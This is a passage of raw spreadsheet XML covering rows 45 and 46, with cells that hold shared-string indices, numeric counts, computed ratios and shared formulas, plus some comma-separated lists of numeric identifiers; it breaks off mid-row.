      <c r="AC45" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD45" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE45" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF45" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG45" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH45" s="99" t="s">
        <v>964</v>
      </c>
      <c r="AI45" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ45" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK45" s="100" t="s">
        <v>965</v>
      </c>
      <c r="AL45" s="100">
        <v>2.0</v>
      </c>
      <c r="AM45" s="100">
        <v>14.0</v>
      </c>
      <c r="AN45" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO45" s="100" t="s">
        <v>965</v>
      </c>
      <c r="AP45" s="100">
        <v>2.0</v>
      </c>
      <c r="AQ45" s="100">
        <v>14.0</v>
      </c>
      <c r="AR45" s="100" t="s">
        <v>965</v>
      </c>
      <c r="AS45" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT45" s="100" t="str">
        <f t="shared" si="89"/>
        <v>1917, 254</v>
      </c>
      <c r="AU45" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV45" s="100" t="s">
        <v>965</v>
      </c>
      <c r="AW45" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX45" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY45" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ45" s="100">
        <v>0.0</v>
      </c>
      <c r="BA45" s="102">
        <v>33.0</v>
      </c>
      <c r="BB45" s="102">
        <v>5.0</v>
      </c>
      <c r="BC45" s="102">
        <v>14.0</v>
      </c>
      <c r="BD45" s="102">
        <v>14.0</v>
      </c>
      <c r="BE45" s="102">
        <v>0.0</v>
      </c>
      <c r="BF45" s="102">
        <v>0.0</v>
      </c>
      <c r="BG45" s="102">
        <v>0.0</v>
      </c>
      <c r="BH45" s="102">
        <v>0.0</v>
      </c>
      <c r="BI45" s="102">
        <v>5.0</v>
      </c>
      <c r="BJ45" s="102">
        <v>14.0</v>
      </c>
      <c r="BK45" s="102">
        <v>14.0</v>
      </c>
      <c r="BL45" s="103">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="BM45" s="103">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="BN45" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO45" s="103">
        <f t="shared" si="6"/>
        <v>14</v>
      </c>
      <c r="BP45" s="103">
        <f t="shared" si="7"/>
        <v>14</v>
      </c>
      <c r="BQ45" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR45" s="103">
        <f t="shared" si="9"/>
        <v>14</v>
      </c>
      <c r="BS45" s="103">
        <f t="shared" si="10"/>
        <v>14</v>
      </c>
      <c r="BT45" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU45" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV45" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW45" s="104" t="s">
        <v>965</v>
      </c>
      <c r="BX45" s="104">
        <v>2.0</v>
      </c>
      <c r="BY45" s="104">
        <v>14.0</v>
      </c>
      <c r="BZ45" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA45" s="104" t="s">
        <v>965</v>
      </c>
      <c r="CB45" s="104">
        <v>2.0</v>
      </c>
      <c r="CC45" s="104">
        <v>14.0</v>
      </c>
      <c r="CD45" s="104" t="s">
        <v>965</v>
      </c>
      <c r="CE45" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF45" s="104" t="str">
        <f t="shared" si="90"/>
        <v>1917, 254</v>
      </c>
      <c r="CG45" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH45" s="104" t="s">
        <v>965</v>
      </c>
      <c r="CI45" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ45" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK45" s="104">
        <v>0.0</v>
      </c>
      <c r="CL45" s="104">
        <v>0.0</v>
      </c>
      <c r="CM45" s="105">
        <v>23.0</v>
      </c>
      <c r="CN45" s="105">
        <v>5.0</v>
      </c>
      <c r="CO45" s="105">
        <v>14.0</v>
      </c>
      <c r="CP45" s="105">
        <v>14.0</v>
      </c>
      <c r="CQ45" s="105">
        <v>0.0</v>
      </c>
      <c r="CR45" s="105">
        <v>14.0</v>
      </c>
      <c r="CS45" s="105">
        <v>0.0</v>
      </c>
      <c r="CT45" s="105">
        <v>0.0</v>
      </c>
      <c r="CU45" s="105">
        <v>0.0</v>
      </c>
      <c r="CV45" s="105">
        <v>0.0</v>
      </c>
      <c r="CW45" s="105">
        <v>5.0</v>
      </c>
      <c r="CX45" s="105">
        <v>14.0</v>
      </c>
      <c r="CY45" s="105">
        <v>14.0</v>
      </c>
      <c r="CZ45" s="105">
        <v>0.0</v>
      </c>
      <c r="DA45" s="105">
        <v>14.0</v>
      </c>
      <c r="DB45" s="106">
        <f t="shared" si="15"/>
        <v>5</v>
      </c>
      <c r="DC45" s="106">
        <f t="shared" si="16"/>
        <v>5</v>
      </c>
      <c r="DD45" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE45" s="106">
        <f t="shared" si="18"/>
        <v>14</v>
      </c>
      <c r="DF45" s="106">
        <f t="shared" si="19"/>
        <v>14</v>
      </c>
      <c r="DG45" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH45" s="106">
        <f t="shared" si="21"/>
        <v>14</v>
      </c>
      <c r="DI45" s="106">
        <f t="shared" si="22"/>
        <v>14</v>
      </c>
      <c r="DJ45" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK45" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL45" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM45" s="108" t="s">
        <v>966</v>
      </c>
      <c r="DN45" s="108">
        <v>4.0</v>
      </c>
      <c r="DO45" s="108">
        <v>20.0</v>
      </c>
      <c r="DP45" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ45" s="108" t="s">
        <v>967</v>
      </c>
      <c r="DR45" s="108">
        <v>4.0</v>
      </c>
      <c r="DS45" s="108">
        <v>20.0</v>
      </c>
      <c r="DT45" s="108" t="s">
        <v>967</v>
      </c>
      <c r="DU45" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV45" s="108" t="str">
        <f t="shared" si="91"/>
        <v>24303, 27611, 1917, 254</v>
      </c>
      <c r="DW45" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX45" s="108" t="s">
        <v>967</v>
      </c>
      <c r="DY45" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ45" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA45" s="108">
        <v>0.0</v>
      </c>
      <c r="EB45" s="108">
        <v>0.0</v>
      </c>
      <c r="EC45" s="109">
        <v>33.0</v>
      </c>
      <c r="ED45" s="109">
        <v>5.0</v>
      </c>
      <c r="EE45" s="109">
        <v>15.0</v>
      </c>
      <c r="EF45" s="109">
        <v>20.0</v>
      </c>
      <c r="EG45" s="109">
        <v>0.0</v>
      </c>
      <c r="EH45" s="109">
        <v>20.0</v>
      </c>
      <c r="EI45" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ45" s="109">
        <v>0.0</v>
      </c>
      <c r="EK45" s="109">
        <v>0.0</v>
      </c>
      <c r="EL45" s="109">
        <v>0.0</v>
      </c>
      <c r="EM45" s="109">
        <v>5.0</v>
      </c>
      <c r="EN45" s="109">
        <v>15.0</v>
      </c>
      <c r="EO45" s="109">
        <v>20.0</v>
      </c>
      <c r="EP45" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ45" s="109">
        <v>20.0</v>
      </c>
      <c r="ER45" s="110">
        <f t="shared" si="27"/>
        <v>5</v>
      </c>
      <c r="ES45" s="110">
        <f t="shared" si="28"/>
        <v>5</v>
      </c>
      <c r="ET45" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU45" s="110">
        <f t="shared" si="30"/>
        <v>15</v>
      </c>
      <c r="EV45" s="110">
        <f t="shared" si="31"/>
        <v>15</v>
      </c>
      <c r="EW45" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX45" s="110">
        <f t="shared" si="33"/>
        <v>20</v>
      </c>
      <c r="EY45" s="110">
        <f t="shared" si="34"/>
        <v>20</v>
      </c>
      <c r="EZ45" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA45" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB45" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC45" s="111" t="s">
        <v>968</v>
      </c>
      <c r="FD45" s="111">
        <v>9.0</v>
      </c>
      <c r="FE45" s="111">
        <v>67.0</v>
      </c>
      <c r="FF45" s="101" t="s">
        <v>969</v>
      </c>
      <c r="FG45" s="111" t="s">
        <v>967</v>
      </c>
      <c r="FH45" s="111">
        <v>4.0</v>
      </c>
      <c r="FI45" s="111">
        <v>20.0</v>
      </c>
      <c r="FJ45" s="111" t="s">
        <v>970</v>
      </c>
      <c r="FK45" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL45" s="111" t="str">
        <f t="shared" si="69"/>
        <v>24303, 27611, 1917, 254, 2101620, 2100527, 2002749, 2001117, 2101917</v>
      </c>
      <c r="FM45" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN45" s="111" t="s">
        <v>971</v>
      </c>
      <c r="FO45" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP45" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ45" s="111">
        <v>0.0</v>
      </c>
      <c r="FR45" s="111">
        <v>0.0</v>
      </c>
      <c r="FS45" s="112">
        <v>23.0</v>
      </c>
      <c r="FT45" s="112">
        <v>9.0</v>
      </c>
      <c r="FU45" s="112">
        <v>21.0</v>
      </c>
      <c r="FV45" s="112">
        <v>20.0</v>
      </c>
      <c r="FW45" s="112">
        <v>47.0</v>
      </c>
      <c r="FX45" s="112">
        <v>54.0</v>
      </c>
      <c r="FY45" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ45" s="112">
        <v>0.0</v>
      </c>
      <c r="GA45" s="112">
        <v>0.0</v>
      </c>
      <c r="GB45" s="112">
        <v>0.0</v>
      </c>
      <c r="GC45" s="112">
        <v>5.0</v>
      </c>
      <c r="GD45" s="112">
        <v>15.0</v>
      </c>
      <c r="GE45" s="112">
        <v>20.0</v>
      </c>
      <c r="GF45" s="112">
        <v>0.0</v>
      </c>
      <c r="GG45" s="112">
        <v>20.0</v>
      </c>
      <c r="GH45" s="113">
        <f t="shared" si="39"/>
        <v>9</v>
      </c>
      <c r="GI45" s="113">
        <f t="shared" si="40"/>
        <v>5</v>
      </c>
      <c r="GJ45" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK45" s="113">
        <f t="shared" si="42"/>
        <v>21</v>
      </c>
      <c r="GL45" s="113">
        <f t="shared" si="43"/>
        <v>15</v>
      </c>
      <c r="GM45" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN45" s="113">
        <f t="shared" si="45"/>
        <v>54</v>
      </c>
      <c r="GO45" s="113">
        <f t="shared" si="46"/>
        <v>20</v>
      </c>
      <c r="GP45" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ45" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR45" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS45" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT45" s="94" t="s">
        <v>972</v>
      </c>
      <c r="GU45" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV45" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW45" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX45" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY45" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ45" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA45" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB45" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC45" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD45" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE45" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF45" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG45" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH45" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI45" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ45" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK45" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL45" s="93">
        <v>32.0</v>
      </c>
      <c r="HM45" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN45" s="93">
        <v>0.0</v>
      </c>
      <c r="HO45" s="93">
        <v>0.0</v>
      </c>
      <c r="HP45" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ45" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR45" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS45" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT45" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU45" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV45" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW45" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX45" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY45" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ45" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA45" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB45" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC45" s="120" t="str">
        <f>HV45</f>
        <v>-</v>
      </c>
      <c r="ID45" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE45" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF45" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG45" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH45" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II45" s="99" t="s">
        <v>973</v>
      </c>
      <c r="IJ45" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK45" s="99">
        <v>18.0</v>
      </c>
      <c r="IL45" s="99">
        <v>0.0</v>
      </c>
      <c r="IM45" s="121">
        <f t="shared" si="93"/>
        <v>0</v>
      </c>
      <c r="IN45" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO45" s="98">
        <v>0.0</v>
      </c>
      <c r="IP45" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ45" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR45" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS45" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT45" s="127"/>
      <c r="IU45" s="127"/>
      <c r="IV45" s="127"/>
      <c r="IW45" s="127"/>
      <c r="IX45" s="127"/>
      <c r="IY45" s="127"/>
      <c r="IZ45" s="127"/>
      <c r="JA45" s="127"/>
      <c r="JB45" s="127"/>
      <c r="JC45" s="127"/>
      <c r="JD45" s="127"/>
      <c r="JE45" s="127"/>
      <c r="JF45" s="127"/>
      <c r="JG45" s="127"/>
      <c r="JH45" s="127"/>
      <c r="JI45" s="127"/>
      <c r="JJ45" s="127"/>
      <c r="JK45" s="127"/>
      <c r="JL45" s="127"/>
      <c r="JM45" s="127"/>
      <c r="JN45" s="127"/>
      <c r="JO45" s="127"/>
      <c r="JP45" s="127"/>
      <c r="JQ45" s="127"/>
      <c r="JR45" s="127"/>
      <c r="JS45" s="127"/>
      <c r="JT45" s="127"/>
      <c r="JU45" s="127"/>
      <c r="JV45" s="127"/>
      <c r="JW45" s="127"/>
      <c r="JX45" s="127"/>
      <c r="JY45" s="127"/>
      <c r="JZ45" s="127"/>
      <c r="KA45" s="127"/>
      <c r="KB45" s="127"/>
      <c r="KC45" s="127"/>
      <c r="KD45" s="127"/>
      <c r="KE45" s="127"/>
      <c r="KF45" s="127"/>
      <c r="KG45" s="127"/>
      <c r="KH45" s="127"/>
      <c r="KI45" s="127"/>
      <c r="KJ45" s="127"/>
      <c r="KK45" s="127"/>
      <c r="KL45" s="127"/>
      <c r="KM45" s="127"/>
      <c r="KN45" s="127"/>
      <c r="KO45" s="127"/>
      <c r="KP45" s="127"/>
      <c r="KQ45" s="127"/>
      <c r="KR45" s="127"/>
      <c r="KS45" s="127"/>
      <c r="KT45" s="127"/>
      <c r="KU45" s="127"/>
      <c r="KV45" s="127"/>
      <c r="KW45" s="127"/>
      <c r="KX45" s="127"/>
      <c r="KY45" s="127"/>
      <c r="KZ45" s="127"/>
      <c r="LA45" s="127"/>
      <c r="LB45" s="127"/>
      <c r="LC45" s="127"/>
      <c r="LD45" s="127"/>
      <c r="LE45" s="127"/>
      <c r="LF45" s="127"/>
      <c r="LG45" s="127"/>
      <c r="LH45" s="127"/>
      <c r="LI45" s="127"/>
      <c r="LJ45" s="127"/>
      <c r="LK45" s="127"/>
      <c r="LL45" s="127"/>
      <c r="LM45" s="127"/>
      <c r="LN45" s="127"/>
      <c r="LO45" s="127"/>
      <c r="LP45" s="127"/>
      <c r="LQ45" s="127"/>
      <c r="LR45" s="127"/>
      <c r="LS45" s="127"/>
      <c r="LT45" s="127"/>
      <c r="LU45" s="127"/>
      <c r="LV45" s="127"/>
      <c r="LW45" s="127"/>
      <c r="LX45" s="127"/>
      <c r="LY45" s="127"/>
      <c r="LZ45" s="127"/>
      <c r="MA45" s="127"/>
      <c r="MB45" s="127"/>
      <c r="MC45" s="127"/>
      <c r="MD45" s="127"/>
      <c r="ME45" s="127"/>
      <c r="MF45" s="127"/>
      <c r="MG45" s="127"/>
      <c r="MH45" s="127"/>
      <c r="MI45" s="127"/>
      <c r="MJ45" s="127"/>
      <c r="MK45" s="127"/>
      <c r="ML45" s="127"/>
      <c r="MM45" s="127"/>
      <c r="MN45" s="127"/>
      <c r="MO45" s="127"/>
      <c r="MP45" s="127"/>
      <c r="MQ45" s="127"/>
      <c r="MR45" s="127"/>
      <c r="MS45" s="127"/>
      <c r="MT45" s="127"/>
      <c r="MU45" s="127"/>
      <c r="MV45" s="127"/>
      <c r="MW45" s="127"/>
      <c r="MX45" s="127"/>
      <c r="MY45" s="127"/>
      <c r="MZ45" s="127"/>
      <c r="NA45" s="127"/>
      <c r="NB45" s="127"/>
      <c r="NC45" s="127"/>
      <c r="ND45" s="127"/>
      <c r="NE45" s="127"/>
      <c r="NF45" s="127"/>
      <c r="NG45" s="127"/>
      <c r="NH45" s="127"/>
      <c r="NI45" s="127"/>
      <c r="NJ45" s="127"/>
      <c r="NK45" s="127"/>
      <c r="NL45" s="127"/>
      <c r="NM45" s="127"/>
      <c r="NN45" s="127"/>
      <c r="NO45" s="127"/>
      <c r="NP45" s="127"/>
      <c r="NQ45" s="127"/>
      <c r="NR45" s="127"/>
      <c r="NS45" s="127"/>
      <c r="NT45" s="127"/>
      <c r="NU45" s="127"/>
      <c r="NV45" s="127"/>
      <c r="NW45" s="127"/>
      <c r="NX45" s="127"/>
      <c r="NY45" s="127"/>
    </row>
    <row r="46" ht="153.75" customHeight="1">
      <c r="B46" s="146" t="s">
        <v>633</v>
      </c>
      <c r="C46" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D46" s="90" t="s">
        <v>635</v>
      </c>
      <c r="E46" s="90" t="s">
        <v>974</v>
      </c>
      <c r="F46" s="90" t="s">
        <v>975</v>
      </c>
      <c r="G46" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H46" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I46" s="92" t="s">
        <v>976</v>
      </c>
      <c r="J46" s="152" t="s">
        <v>977</v>
      </c>
      <c r="K46" s="92" t="s">
        <v>978</v>
      </c>
      <c r="L46" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M46" s="93">
        <v>217.0</v>
      </c>
      <c r="N46" s="93">
        <v>212.0</v>
      </c>
      <c r="O46" s="93">
        <v>0.0</v>
      </c>
      <c r="P46" s="93">
        <v>212.0</v>
      </c>
      <c r="Q46" s="93">
        <f t="shared" si="94"/>
        <v>212</v>
      </c>
      <c r="R46" s="93">
        <v>212.0</v>
      </c>
      <c r="S46" s="93">
        <v>0.0</v>
      </c>
      <c r="T46" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U46" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V46" s="96" t="s">
        <v>979</v>
      </c>
      <c r="W46" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X46" s="97" t="s">
        <v>980</v>
      </c>
      <c r="Y46" s="96" t="s">
        <v>981</v>
      </c>
      <c r="Z46" s="96" t="s">
        <v>982</v>
      </c>
      <c r="AA46" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB46" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC46" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD46" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE46" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF46" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG46" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH46" s="99" t="s">
        <v>983</v>
      </c>
      <c r="AI46" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ46" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK46" s="100">
        <v>1917.0</v>
      </c>
      <c r="AL46" s="100">
        <v>1.0</v>
      </c>
      <c r="AM46" s="100">
        <v>8.0</v>
      </c>
      <c r="AN46" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO46" s="100">
        <v>1917.0</v>
      </c>
      <c r="AP46" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ46" s="100">
        <v>8.0</v>
      </c>
      <c r="AR46" s="100">
        <v>1917.0</v>
      </c>
      <c r="AS46" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT46" s="100">
        <f t="shared" si="89"/>
        <v>1917</v>
      </c>
      <c r="AU46" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV46" s="100">
        <v>1917.0</v>
      </c>
      <c r="AW46" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX46" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY46" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ46" s="100">
        <v>0.0</v>
      </c>
      <c r="BA46" s="102">
        <v>217.0</v>
      </c>
      <c r="BB46" s="102">
        <v>2.0</v>
      </c>
      <c r="BC46" s="102">
        <v>8.0</v>
      </c>
      <c r="BD46" s="102">
        <v>8.0</v>
      </c>
      <c r="BE46" s="102">
        <v>0.0</v>
      </c>
      <c r="BF46" s="102">
        <v>0.0</v>
      </c>
      <c r="BG46" s="102">
        <v>0.0</v>
      </c>
      <c r="BH46" s="102">
        <v>0.0</v>
      </c>
      <c r="BI46" s="102">
        <v>2.0</v>
      </c>
      <c r="BJ46" s="102">
        <v>8.0</v>
      </c>
      <c r="BK46" s="102">
        <v>8.0</v>
      </c>
      <c r="BL46" s="103">
        <f t="shared" si="3"/>
        <v>0.009433962264</v>
      </c>
      <c r="BM46" s="103">
        <f t="shared" si="4"/>
        <v>0.009433962264</v>
      </c>
      <c r="BN46" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO46" s="103">
        <f t="shared" si="6"/>
        <v>0.03773584906</v>
      </c>
      <c r="BP46" s="103">
        <f t="shared" si="7"/>
        <v>0.03773584906</v>
      </c>
      <c r="BQ46" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR46" s="103">
        <f t="shared" si="9"/>
        <v>0.03773584906</v>
      </c>
      <c r="BS46" s="103">
        <f t="shared" si="10"/>
        <v>0.03773584906</v>
      </c>
      <c r="BT46" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU46" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV46" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW46" s="104">
        <v>1917.0</v>
      </c>
      <c r="BX46" s="104">
        <v>1.0</v>
      </c>
      <c r="BY46" s="104">
        <v>8.0</v>
      </c>
      <c r="BZ46" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA46" s="104">
        <v>1917.0</v>
      </c>
      <c r="CB46" s="104">
        <v>1.0</v>
      </c>
      <c r="CC46" s="104">
        <v>8.0</v>
      </c>
      <c r="CD46" s="104">
        <v>1917.0</v>
      </c>
      <c r="CE46" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF46" s="104">
        <f t="shared" si="90"/>
        <v>1917</v>
      </c>
      <c r="CG46" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH46" s="104">
        <v>1917.0</v>
      </c>
      <c r="CI46" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ46" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK46" s="104">
        <v>0.0</v>
      </c>
      <c r="CL46" s="104">
        <v>0.0</v>
      </c>
      <c r="CM46" s="105">
        <v>215.0</v>
      </c>
      <c r="CN46" s="105">
        <v>2.0</v>
      </c>
      <c r="CO46" s="105">
        <v>8.0</v>
      </c>
      <c r="CP46" s="105">
        <v>8.0</v>
      </c>
      <c r="CQ46" s="105">
        <v>0.0</v>
      </c>
      <c r="CR46" s="105">
        <v>8.0</v>
      </c>
      <c r="CS46" s="105">
        <v>0.0</v>
      </c>
      <c r="CT46" s="105">
        <v>0.0</v>
      </c>
      <c r="CU46" s="105">
        <v>0.0</v>
      </c>
      <c r="CV46" s="105">
        <v>0.0</v>
      </c>
      <c r="CW46" s="105">
        <v>2.0</v>
      </c>
      <c r="CX46" s="105">
        <v>8.0</v>
      </c>
      <c r="CY46" s="105">
        <v>8.0</v>
      </c>
      <c r="CZ46" s="105">
        <v>0.0</v>
      </c>
      <c r="DA46" s="105">
        <v>8.0</v>
      </c>
      <c r="DB46" s="106">
        <f t="shared" si="15"/>
        <v>0.009433962264</v>
      </c>
      <c r="DC46" s="106">
        <f t="shared" si="16"/>
        <v>0.009433962264</v>
      </c>
      <c r="DD46" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE46" s="106">
        <f t="shared" si="18"/>
        <v>0.03773584906</v>
      </c>
      <c r="DF46" s="106">
        <f t="shared" si="19"/>
        <v>0.03773584906</v>
      </c>
      <c r="DG46" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH46" s="106">
        <f t="shared" si="21"/>
        <v>0.03773584906</v>
      </c>
      <c r="DI46" s="106">
        <f t="shared" si="22"/>
        <v>0.03773584906</v>
      </c>
      <c r="DJ46" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK46" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL46" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM46" s="108">
        <v>1917.0</v>
      </c>
      <c r="DN46" s="108">
        <v>1.0</v>
      </c>
      <c r="DO46" s="108">
        <v>8.0</v>
      </c>
      <c r="DP46" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ46" s="108">
        <v>1917.0</v>
      </c>
      <c r="DR46" s="108">
        <v>1.0</v>
      </c>
      <c r="DS46" s="108">
        <v>8.0</v>
      </c>
      <c r="DT46" s="108">
        <v>1917.0</v>
      </c>
      <c r="DU46" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV46" s="108">
        <f t="shared" si="91"/>
        <v>1917</v>
      </c>
      <c r="DW46" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX46" s="108">
        <v>1917.0</v>
      </c>
      <c r="DY46" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ46" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA46" s="108">
        <v>0.0</v>
      </c>
      <c r="EB46" s="108">
        <v>0.0</v>
      </c>
      <c r="EC46" s="109">
        <v>217.0</v>
      </c>
      <c r="ED46" s="109">
        <v>2.0</v>
      </c>
      <c r="EE46" s="109">
        <v>8.0</v>
      </c>
      <c r="EF46" s="109">
        <v>8.0</v>
      </c>
      <c r="EG46" s="109">
        <v>0.0</v>
      </c>
      <c r="EH46" s="109">
        <v>8.0</v>
      </c>
      <c r="EI46" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ46" s="109">
        <v>0.0</v>
      </c>
      <c r="EK46" s="109">
        <v>0.0</v>
      </c>
      <c r="EL46" s="109">
        <v>0.0</v>
      </c>
      <c r="EM46" s="109">
        <v>2.0</v>
      </c>
      <c r="EN46" s="109">
        <v>8.0</v>
      </c>
      <c r="EO46" s="109">
        <v>8.0</v>
      </c>
      <c r="EP46" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ46" s="109">
        <v>8.0</v>
      </c>
      <c r="ER46" s="110">
        <f t="shared" si="27"/>
        <v>0.009433962264</v>
      </c>
      <c r="ES46" s="110">
        <f t="shared" si="28"/>
        <v>0.009433962264</v>
      </c>
      <c r="ET46" s="110">
